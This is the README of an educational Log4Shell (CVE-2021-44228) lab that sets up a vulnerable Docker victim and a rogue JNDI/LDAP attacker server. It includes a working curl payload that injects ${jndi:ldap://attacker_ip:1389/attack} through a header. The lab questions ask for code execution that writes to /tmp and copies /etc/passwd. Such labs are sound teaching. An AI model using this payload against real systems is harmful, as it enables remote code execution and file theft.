Warning: This Repository is only for educational purposes.

Index

• Index
• Introduction
• Prerequesites
  • Need help installing?
• Setup the environment
  • Docker Setup
  • Java Setup
  • Maven Setup
• Lab Instructions
• Setting up victim and attacker's environment
  • Setting up victim's environment
  • Setting up attacker's environment
  • Executing the attack
• Lab Questions
• References

Introduction

Welcome to the Log4j lab for PRA9201.

In this lab we will explore the exploitation of Log4j, specifically with JNDI and LDAP (CVE-2021-44228).

This lab works for all Windows, MacOS (Intel and M1) as well as Linux devices.

Prerequesites

• Docker (https://docs.docker.com/install/) or Docker Desktop (https://www.docker.com/products/docker-desktop/)
• Java (https://www.oracle.com/technetwork/java/javase/downloads/index.html)
• Maven (https://maven.apache.org/download.cgi)

Need help installing?

• Refer to Setup the environment section

Setup the environment

Note: The following instruction is for debian based system only.

Docker Setup

# Setup Repository
sudo apt update
sudo apt install ca-certificates curl gnupg lsb-release

# Add docker official GPG key
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

# Set docker channel to stable
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

# Install docker engine
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io

# Verify docker is working
sudo docker run hello-world

Java Setup

sudo apt update
sudo apt install default-jre

Maven Setup

sudo apt update
sudo apt install maven

Lab Instructions

Setting up victim and attacker's environment

Setting up victim's environment

# Go into /victim folder
cd victim

# Run the victim's server with vulnerability
docker build . -t victim-vulnerable-app
docker run --name victim -p 8080:8080 victim-vulnerable-app
# To verify the above container is working, go to your browser and type in http://ip_addr:8080,
# You should see a page but with error

Setting up attacker's environment

# Go into /attacker folder
cd attacker

# Package the java program
mvn package

# Run the attacker's malicious LDAP server
# TODO: Figure out how to run the LDAP server
# (Lab Q5.)
# HINT: Run java -jar target/RogueJndi-1.1.jar -h
# HINT 2: What is the attacker's ip?

Executing the attack

# Send the attack payload to the victim's server
# HINT: What is the victim's ip?
# NOTE: Make sure you change victim_ip and attacker_ip
curl victim_ip:8080 -H 'X-Api-Version: ${jndi:ldap://attacker_ip:1389/attack}'

# Check docker image to see if the file has been modified/created

Lab Questions

Here's the link to google drive for you to clone and write answers in link.

1. How does the vulnerability in Log4j work in terms of JNDI?
2. What did people do when they discovered the vulnerability?
   • What steps did they take to prevent any further exploit?
3. Why do you need a dedicated malicious LDAP server, instead of using any of the existing one in the internet?
4. Why do you need to execute the java command to spin up a server before you execute curl?
5. Execute LDAP Server command to touch a file at /tmp/ha-pwned and provide a screenshot of ls -la /tmp/ as well as the command executed
6. Modify the previous command, but now copy /etc/passwd into /tmp/ha-pwned and provide a screenshot of cat /tmp/ha-pwned as well as the command executed

References

• StandB/CVE-2021-44228-poc
• Veracode-research/rogue-jndi